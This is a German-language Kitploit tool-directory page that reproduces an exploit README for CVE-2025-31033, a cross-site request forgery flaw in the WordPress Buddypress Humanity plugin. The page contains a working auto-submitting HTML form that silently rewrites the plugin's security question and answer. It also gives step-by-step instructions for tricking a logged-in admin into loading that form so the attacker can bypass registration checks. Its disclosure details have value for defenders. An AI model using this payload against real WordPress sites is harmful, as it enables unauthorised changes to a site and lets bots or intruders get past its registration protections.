Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-31033 — WordPress Buddypress Humanity Plugin <= 1.2 ist anfällig für Cross Site Request Forgery (CSRF) | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-31033
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPapers & ForschungLernen & Bildung
GitHubnxploited/cve-2025-31033

CVE-2025-31033

WordPress Buddypress Humanity Plugin <= 1.2 ist anfällig für Cross Site Request Forgery (CSRF)

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

⚠️ CVE-2025-31033 - CSRF im WordPress Buddypress Humanity Plugin <= 1.2

🛡️ Zusammenfassung der Schwachstelle

Das Buddypress Humanity Plugin für WordPress (Version <= 1.2) ist anfällig für Cross-Site Request Forgery (CSRF).
Diese Schwachstelle ermöglicht es einem Angreifer, einen Benutzer mit höheren Berechtigungen (z.B. Admin) dazu zu zwingen, ohne sein Wissen Plugin-Einstellungen (wie Sicherheitsfrage und -antwort) zu ändern und damit die Benutzerverifizierungslogik zu umgehen.


🐞 Schwachstellentyp

  • Cross Site Request Forgery (CSRF)
  • Betroffene Komponente: bph-settings Seite (nur Admin)
  • CVE: CVE-2025-31033
  • Risiken CVSS 9.8

🚨 Auswirkungen

Bei erfolgreicher Ausnutzung ermöglicht diese Schwachstelle Angreifern Folgendes:

  • Die bei der Benutzerregistrierung verwendete Sicherheitsfrage und -antwort zu ändern
  • Die Menschlichkeitsüberprüfung zu umgehen, indem die neue Antwort bekannt ist
  • Die Benutzerregistrierung zu automatisieren (möglicherweise in Kombination mit Privilegieneskalation)
  • Schutzmaßnahmen des Registrierungsformulars ohne Benutzerinteraktion zu missbrauchen

🎯 Betroffenes Plugin

  • Name: Buddypress Humanity
  • Version: ≤ 1.2
  • Slug: buddypress-humanity
  • Getestet auf: WordPress 6.x + BuddyPress aktiv

💥 Proof of Concept (HTML-Exploit)

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Exploit – CVE-2025-31033</title>
</head>
<body onload="document.forms[0].submit();">
  <form action="http://target.com/wp-admin/admin.php?page=bph-settings" method="POST">
    <input type="hidden" name="bph_option[bph_title]" value="Nxploited">
    <input type="hidden" name="bph_option[bph_question]" value="I’m Nxploited | Khaled Alenazi">
    <input type="hidden" name="bph_option[bph_answers]" value="Nxploit">
    <input type="hidden" name="bph_submit" value="1">
  </form>
</body>
</html>

☠️ Sobald diese Seite von einem authentifizierten Admin geöffnet wird, ändert sie stillschweigend die Plugin-Einstellungen.


🔧 So wird es ausgenutzt

  1. Hosten Sie das PoC-HTML auf einem beliebigen externen Server.
  2. Täuschen Sie einen eingeloggten WordPress-Admin, die Seite zu besuchen.
  3. Beim Besuch sendet der Browser stillschweigend das Formular ab.
  4. Die Sicherheitsfrage und -antwort des Plugins werden aktualisiert.
  5. Der Angreifer kann sich nun mit der bekannten Antwort registrieren.

🧪 Erfolgreiche Ausnutzung führt zu:

  • Geänderte Frage: I’m Nxploited | Khaled Alenazi
  • Geänderte Antwort: Nxploit
  • Jeder Benutzer, der "Nxploit" eingibt, umgeht die Überprüfung.

⚠️ Haftungsausschluss

Dieses Proof of Concept dient ausschließlich zu Bildungszwecken.
Verwenden Sie es verantwortungsbewusst und testen Sie nicht an Systemen, die Ihnen nicht gehören.
Der Autor übernimmt keine Verantwortung für Missbrauch oder verursachte Schäden.


👤 Von

Nxploited | Khaled Alenazi

Tool herunterladen